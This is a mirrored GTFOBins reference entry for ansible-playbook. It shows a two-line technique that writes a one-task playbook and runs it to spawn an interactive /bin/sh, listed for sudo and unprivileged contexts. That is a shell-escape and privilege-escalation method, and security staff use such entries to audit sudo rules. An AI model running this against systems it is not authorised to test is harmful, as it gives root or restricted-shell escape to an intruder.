mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-07 14:36:23 +01:00
11 lines
239 B
Plaintext
11 lines
239 B
Plaintext
---
|
|
functions:
|
|
shell:
|
|
- code: |-
|
|
echo '[{hosts: localhost, tasks: [shell: /bin/sh </dev/tty >/dev/tty 2>/dev/tty]}]' >/path/to/temp-file
|
|
ansible-playbook /path/to/temp-file
|
|
contexts:
|
|
sudo:
|
|
unprivileged:
|
|
...
|